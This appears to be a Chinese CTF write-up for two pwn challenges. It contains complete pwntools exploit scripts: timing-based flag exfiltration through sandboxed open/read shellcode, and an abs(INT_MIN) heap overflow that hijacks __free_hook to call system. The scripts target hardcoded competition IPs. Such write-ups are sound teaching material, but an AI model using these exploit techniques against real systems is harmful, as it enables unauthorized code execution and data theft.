secretcode

去年决赛、今年线上初赛题目、今年决赛还是这题,一题 3 次

考点还是那样 open read 通过延时爆破 flag ,这次沙箱就多了个规则需要 fd 大于 0x14 才能调用 read ,多写一个 while 循环的事情

由于多了 while 循环 flag 位置变了一下,直接从第二个字符开始爆破

# encoding=utf-8
from pwn import *

file_path = "./chall"  # the challenge binary this script talks to
context.arch = "amd64"  # asm() below emits x86-64 code
# context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)  # loaded but not referenced anywhere else on this page
# 0: the loop at the bottom connects to the remote service; non-zero: it
# spawns `file_path` locally with process() instead.
debug = 0
# if debug:
# p = process([file_path])
# gdb.attach(p, "b *$rebase(0xC94)")
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# one_gadget = 0x0
#
# else:
# p = remote('', 0)
# libc = ELF('')
# one_gadget = 0x0


def pwn(p, index: int, ch: int) -> None:
    """Assemble one probe for the guess "byte `index` of the file == `ch`" and send it.

    The probe is built from fixed assembly fragments joined by relative
    jumps (`$-24`, `$-3`, `$-4`), so the byte length of every fragment is
    part of the contract: reordering or editing a fragment silently
    retargets the jumps.

    Args:
        p: pwntools tube (process or remote) that receives the payload.
        index: offset into the read buffer to compare.
        ch: byte value (0x20..126 in the caller) compared against that offset.
    """

    # open
    # shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; xor esi, esi; pop rax; syscall;"
    # rdi = 0x10034aaa >> 12 = 0x10034 (path pointer), esi = 0 (flags),
    # rax = 2 (open on x86-64). The constant is pushed as an immediate and
    # shifted so that the encoding contains no zero bytes.
    shellcode = '''push 0x10034aaa;pop rdi;shr edi, 12;xor esi, esi;push 2;pop rax;syscall;'''

    # Re-run the open fragment (24 bytes back = its first push) while
    # r15 <= 0x14; the write-up says the sandbox only permits read() on fds
    # above 0x14. r15 is never initialised here -- assumes the host leaves
    # it at 0 or a small value; TODO confirm.
    shellcode += "add r15,1;cmp r15 , 0x14; jle $-24;"

    # read(rax, 0x10040, 0x50)
    # shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
    # rax still holds the fd from the last open; rsi = 0x10040 is the
    # destination buffer that the comparison below indexes.
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"

    # cmp and jz
    # `jz` targets the cmp itself, i.e. spins forever on a match and returns
    # otherwise -- that delay is what the caller measures. The offset differs
    # because `cmp byte ptr [rsi], imm8` encodes to 3 bytes and the
    # `[rsi+disp8]` form to 4.
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    shellcode = asm(shellcode)

    # p.sendlineafter("execution-box.\n", read_next.ljust(0x30))

    # Pad to 0x40-14 = 50 bytes so './flag' lands at a fixed offset in the
    # buffer (presumably the spot 0x10034 points at -- not verifiable from
    # this script). Note ljust never truncates: if the assembled code grew
    # past 50 bytes the path would shift and the open() pointer would be wrong.
    p.sendafter("\n", shellcode.ljust(0x40 - 14, b'a') + b'./flag')


# Driver: for each position, try every printable byte and keep the one whose
# probe stalls (the shellcode spins on a match, so the connection only goes
# quiet when the guess is right). The pasted source lost its indentation;
# this reading takes the `else` as the for-loop's else clause (run when no
# byte matched), which is the only reading under which the outer loop ends.
index = 1  # the write-up says position 0 is skipped because of the extra loop
ans = []  # matched byte values, in order
while True:
    for ch in range(0x20, 127):
        # One fresh connection per guess: the probe either spins or returns,
        # and the process is discarded afterwards.
        if debug:
            p = process([file_path])
        else:
            # p = remote('8.131.246.36', 40334)
            p = remote("47.104.169.149",25178)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            # Bare except also swallows KeyboardInterrupt; `except EOFError:`
            # is what the closed-connection case actually needs. With
            # pwntools a timeout returns an empty buffer rather than
            # raising -- verify for the installed version.
            pass
        end = time.time()
        p.close()
        # 1.5 s sits between "returned immediately" and the 2 s recv timeout.
        # A slow network hop can push a non-matching probe over the threshold;
        # the hit is not re-verified.
        if end - start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        # No byte matched at this position: treat it as the end of the data.
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1
    print(ans)

print("".join([chr(i) for i in ans]))

normal-babynote

abs函数接收4字节有符号int数,当传入0x80000000时,其返回结果仍然是0x80000000,int正数将无法表示这么大,因此,其值是一个负数,造成堆溢出,可以修改自身的 size 位

from pwn import *
# pwntools globals: 'debug' echoes every byte sent and received; the terminal
# setting is only consumed by gdb.attach, which is commented out further down.
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']


def add(size,content):
    """Menu option 1 (the author's "add"): send a size, then the raw content.

    Uses the module-level tube `p`. `content` is sent as-is, without a
    trailing newline, so the caller supplies its own terminator.
    """
    prompt = "> "
    p.sendlineafter(prompt, "1")
    p.sendlineafter(prompt, str(size))
    p.sendafter(prompt, content)
def edit(id,offset,content):
    """Menu option 2 (the author's "edit"): note id, write offset, then raw content.

    Uses the module-level tube `p`. The offset is sent as a decimal string;
    the write-up notes the service runs it through abs(), which is where
    0x80000000 slips past the range check.
    """
    prompt = "> "
    for field in ("2", str(id), str(offset)):
        p.sendlineafter(prompt, field)
    p.sendafter(prompt, content)
def delete(id):
    """Menu option 3 (the author's "delete"): release the note with index `id`.

    Uses the module-level tube `p`.
    """
    prompt = "> "
    for field in ("3", str(id)):
        p.sendlineafter(prompt, field)
def show(id):
    """Menu option 4 (the author's "show"): ask the service to print note `id`.

    Uses the module-level tube `p`; the caller reads the reply itself.
    """
    prompt = "> "
    for field in ("4", str(id)):
        p.sendlineafter(prompt, field)


# NOTE(review): the local process started here is immediately shadowed by the
# remote() tube on the next line and never closed, so a stray ./chall child is
# left running. Pick one or guard the local one with a debug flag.
p = process("./chall")
p = remote("47.104.169.149",14269)
# Local libc used only for symbol offsets; must match the remote build for
# the arithmetic below to hold.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

add(0xf8,'\n')#0
add(0x220,'\n')#1
add(0x100,'\n')#2
add(0x18,'/bin/sh\x00\n')

# 48 filler bytes, then two qwords; the second (0x441) is the size field the
# write-up says the overflow lets us rewrite.
payload = 'a'*48
payload += p64(0x200)+p64(0x441) + '\n'
# Root cause per the write-up: the service validates the offset with abs(),
# and abs(INT_MIN) is undefined in C -- on common ABIs it returns INT_MIN,
# a negative value that passes the check. On the program side the fix is to
# reject offsets outside [0, size) before any sign manipulation, or to use
# a wider type for the check.
edit(0,0x80000000,payload)

delete(0)
add(0xf8,'\n')#0
show(1)
# First 6 bytes of the reply are taken as a heap-resident libc pointer.
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(leak_addr)
# The subtracted difference is a constant captured from one debugger session
# (the two raw addresses), so it is tied to that exact libc build -- verify
# against the target's libc rather than reusing it blindly.
libc_base = leak_addr-(0x7ffff7dcdca0-0x7ffff79e2000)
print hex(libc_base)
free_hook = libc_base+libc.symbols['__free_hook']
print "free_hook:",hex(free_hook)
system_addr = libc_base + libc.sym['system']
print system_addr

add(0x220,'\n')#1
delete(1)
# Writes into a note that was just freed; the two add() calls that follow are
# expected to hand back a chunk overlapping free_hook, which edit(7, ...)
# then points at system. The note indices (5, 7) depend on the allocation
# order above -- presumably the service never reuses slots; confirm.
edit(5,0,p64(free_hook)+'\n')
add(0x220,'\n')#1
add(0x220,'ls;\x00\n')#1

edit(7,0,p64(system_addr)+'\n')

# gdb.attach(p,"*$rebase(0xd1A)")
# raw_input()


# Releases note 3 (the '/bin/sh' one), which goes through the rewritten hook.
delete(3)

'''
for i in range(10):
add(0xf8,'\n')
for i in range(3,10):
delete(i)
delete(0)

edit(2,0x80000000,payload)
delete(2)

for i in range(5):
add(0xf8,'\n')
'''



# edit(1,0x80000000,'a'*0x200+'\n')


# edit(0,0x80000000,'a'*0x18+'\n')










p.interactive()